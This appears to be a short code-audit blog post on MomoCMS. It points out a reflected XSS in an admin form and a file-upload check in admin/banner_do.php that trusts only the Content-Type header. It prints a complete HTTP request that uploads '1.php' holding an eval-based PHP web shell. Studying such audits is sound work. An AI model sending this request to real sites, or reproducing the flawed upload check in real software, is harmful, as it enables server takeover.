When I was bored, I saw a popular program on Webmaster Home, so I downloaded it and looked at it.
The front-end $_GET is filtered using the intval() function, and there is nothing to exploit.
There is an xss in the background
at line 96 of
admincreate_sub_product.php
<span style="font-family:Microsoft YaHei;font-size:18px;"><input type="hidden" name="category" value="<?php echo $_GET['id']; ?>"> <p> </span>
Second: Upload vulnerability
at admin/banner_do.php The code in
is as follows
<span style="font-family:Microsoft YaHei;font-size:18px;">require("./database.php");
if(empty($_SESSION['momocms_admin'])){
header("Location:./index.php");
exit;
}
if($_SESSION['momocms_isAdmin']==1){
if (($_FILES["banner"]["type"] == "image/gif")
|| ($_FILES["banner"]["type"] == "image/jpeg")
|| ($_FILES["banner"]["type"] == "image/png")
|| ($_FILES["banner"]["type"] == "image/pjpeg"))
{
if ($_FILES["banner"]["error"] > 0){
echo "Return Code: " . $_FILES["banner"]["error"] . "<br />";
}else{
if(!is_dir("../resource/slide/images")){
mkdir("../resource/slide/images");
}
$pos = strrpos($_FILES["banner"]["name"],".");
$back = substr($_FILES["banner"]["name"],$pos);
$_FILES["banner"]["name"] = time().$back;
move_uploaded_file($_FILES["banner"]["tmp_name"],
"../resource/slide/images/". $_FILES["banner"]["name"]);
$pic="../resource/slide/images/". $_FILES["banner"]["name"];
echo '<script>
parent.document.getElementById("successMsg").style.display="block";
setTimeout(function(){
parent.window.location.href="./banner.php";
},1500);
</script>';
}
}
}
</span>You can see that upload to determines the upload type, but does not determine the upload suffix, etc.
So you can construct Content-type: image/jpeg to break through the upload
<span style="font-family:Microsoft YaHei;font-size:18px;">POST /test/momocms/admin/banner_do.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/test/momocms/admin/banner.php Cookie: PHPSESSID=a920be64bc19dc2b620e7ddab2441811 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------13761195204349 Content-Length: 227 -----------------------------13761195204349 Content-Disposition: form-data; name="banner"; filename="1.php" Content-Type: image/jpeg <?php eval($_POST['w']);?> -----------------------------13761195204349-- </span>
Then where can you directly modify the php source code in the background widget
I’ve seen so much for the time being. There are others to look at later.
The above introduces momocms code audit, including aspects of it. I hope it will be helpful to friends who are interested in PHP tutorials.
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
